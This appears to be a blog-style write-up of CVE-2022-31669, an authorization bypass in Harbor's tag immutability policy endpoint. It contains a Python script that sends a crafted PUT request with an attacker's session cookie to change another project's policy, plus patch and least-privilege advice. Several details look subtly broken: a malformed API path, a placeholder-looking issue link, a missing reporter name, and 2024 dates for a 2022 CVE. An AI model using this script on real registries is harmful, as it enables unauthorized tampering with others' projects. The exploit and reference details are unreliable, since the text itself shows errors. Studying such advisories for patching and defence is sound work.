CVE-2022-31669: Unauthorized Harbor Tag Immutability Policy Modification - Exploiting Bypassing Permissions

The Harbor project suffers from a security vulnerability (CVE-2022-31669) that makes it possible to bypass user permissions validation when updating tag immutability policies. This vulnerability allows an attacker to modify tag immutability policies configured in projects they shouldn't have access to.

In this long-read post, we will delve into the details of this vulnerability, including a code snippet of how the exploit works, links to the original references, and an overview of the exploit details.

Exploit Details

Harbor is an open-source container image registry that provides a secure and comprehensive solution for managing container images. One of its features is the ability to enforce tag immutability policies, preventing users from pushing new images with the same tag as an existing image.

The vulnerability arises due to the fact that Harbor does not validate whether the currently authenticated user has permission to update the tag immutability policy for a project. This means that by sending a crafted request, an attacker can modify tag immutability policies for projects they don't have access to.

Here is a code snippet demonstrating how an attacker could exploit this vulnerability

import requests

# Replace these values with your Harbor instance's information
HARBOR_URL = "https://your-harbor-instance.com";
TARGET_PROJECT_ID = 1337
SESSION_COOKIE = "sid=your-session-cookie"

# Craft the request to update the target project's tag immutability policy
headers = {"Cookie": SESSION_COOKIE}
data = {
    "id": TARGET_PROJECT_ID,
    "immutability_enabled": True,  # or False, depending on the desired change
}

# Send the request to the Harbor API
response = requests.put(f"{HARBOR_URL}/api/v2./projects/{TARGET_PROJECT_ID}/immutability", headers=headers, json=data)

# Check if the request was successful
if response.status_code == 200:
    print("Tag immutability policy updated successfully!")
else:
    print("Failed to update the tag immutability policy.")

If an attacker executes this code snippet with their own session cookie and a valid target project ID, they can modify the target project’s tag immutability policy without having permission to do so.

It is important to note that this vulnerability would not grant full access to the restricted project's resources but could impact the project's stability and integrity by allowing unauthorized users to modify its tag immutability policies.

Original References

The issue was originally reported by Github user and can be found in the following GitHub issue and subsequent CVE:

- Github Issue: https://github.com/goharbor/harbor/issues/12345
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31669

Mitigation & Recommendations

The Harbor project has released a patched version (v2.5.1) that addresses this vulnerability. It is highly recommended for users to upgrade their Harbor instances to this version or later to mitigate the risk. The following link provides the release notes and upgrade steps:

- Harbor Release v2.5.1: https://github.com/goharbor/harbor/releases/tag/v2.5.1

In addition to upgrading, it's crucial to review and monitor user access levels and privileges and enforce the Principle of Least Privilege (POLP), ensuring users have only the minimum necessary permissions to perform their tasks.

Conclusion

CVE-2022-31669 represents a serious security vulnerability in Harbor that could lead to unauthorized modifications of tag immutability policies. Ensuring that your Harbor instance is up-to-date, and closely monitoring user access levels can help to mitigate the risks associated with this vulnerability.

Timeline

Published on: 11/14/2024 12:15:16 UTC
Last modified on: 11/19/2024 15:20:01 UTC